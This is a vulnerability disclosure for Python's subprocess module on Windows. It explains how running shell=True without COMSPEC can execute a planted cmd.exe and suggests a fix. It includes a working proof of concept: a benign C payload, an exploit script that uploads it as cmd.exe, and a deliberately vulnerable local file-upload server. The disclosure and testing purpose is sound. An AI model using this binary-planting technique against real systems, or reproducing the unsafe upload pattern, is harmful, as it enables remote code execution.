There is a vulnerability in python subprocess
module.
When subprocess.Popen
was launched with shell=True
on Windows and without COMSPEC
environment variable,
the executable launched is cmd.exe
and the full path is not defined.
It's possible to launch a malicious cmd.exe
file from working directory
or any any path before the C:\Windows\system32
directory in the PATH
.
I write a simple POC, a vulnerable HTTP server to upload files. I have opened a new issue here.
- Windows machine without
COMSPEC
environment variable - Use
subprocess.Popen
or anysubprocess
functions that usesubprocess.Popen
withshell=True
- The attacker may upload file in the working directory or any directory before the
C:\Windows\system32
directory in thePATH
Replace cmd.exe
by C:\WINDOWS\system32\cmd.exe
in subprocess
module.
#include <stdio.h>
int main() {printf("H4CK3D - EXPLOIT IS WORKING\n");return 0;}
# gcc -o not_cmd.exe RCE_program.c
Compile with gcc -o not_cmd.exe RCE_program.c
command.
from urllib.request import Request, urlopen
from time import strftime, localtime, sleep
print("[*]", strftime("%Y-%m-%d %H:%M:%S", localtime()), "Simple GET request to see the default behaviour...")
get_response = urlopen("http://127.0.0.1:8000/")
sleep(2)
print("[+]", strftime("%Y-%m-%d %H:%M:%S", localtime()), "Start exploit with upload a malicious cmd.exe file...")
post_response = urlopen(Request("http://127.0.0.1:8000/cmd.exe", data=open('not_cmd.exe', 'rb').read())) # write a cmd.exe file
sleep(2)
print("[+]", strftime("%Y-%m-%d %H:%M:%S", localtime()), "RCE with malicious cmd.exe file...")
exploit_response = urlopen("http://127.0.0.1:8000/") # RCE -> cmd.exe file is executed instead of C:\WINDOWS\system32\cmd.exe
from wsgiref.simple_server import make_server
from subprocess import Popen, DEVNULL
from os.path import basename
from sys import executable
from os import environ
del environ['COMSPEC'] # force environment without COMSPEC
def app(environ, start_response):
method = environ["REQUEST_METHOD"]
print('[*] New request, method:', method)
if method == "GET":
process = Popen("myprogram", shell=True, stderr=DEVNULL)
process.communicate()
print('[+] Process exit code:', process.returncode)
status = "200 OK"
content = b"GET OK"
elif method == "POST":
status = "200 OK"
content = b"File uploaded successfully."
content_length = environ.get("CONTENT_LENGTH", "0")
if content_length.isdigit():
filename = basename(environ["PATH_INFO"])
with open(filename, 'wb') as file:
file.write(environ["wsgi.input"].read(int(content_length)))
print('[+] New file written:', filename)
else:
status = "400 Bad Request"
content = b'Invalid Content-Length header.'
else:
status = "400 Bad Request"
content = b"Only GET and POST methods allowed."
start_response(status, [('Content-type', 'text/plain')])
return (content,)
with make_server('127.0.0.1', 8000, app) as httpd:
print('[*] Serving HTTP on 127.0.0.1 port 8000 (http://127.0.0.1:8000/) ...')
httpd.serve_forever()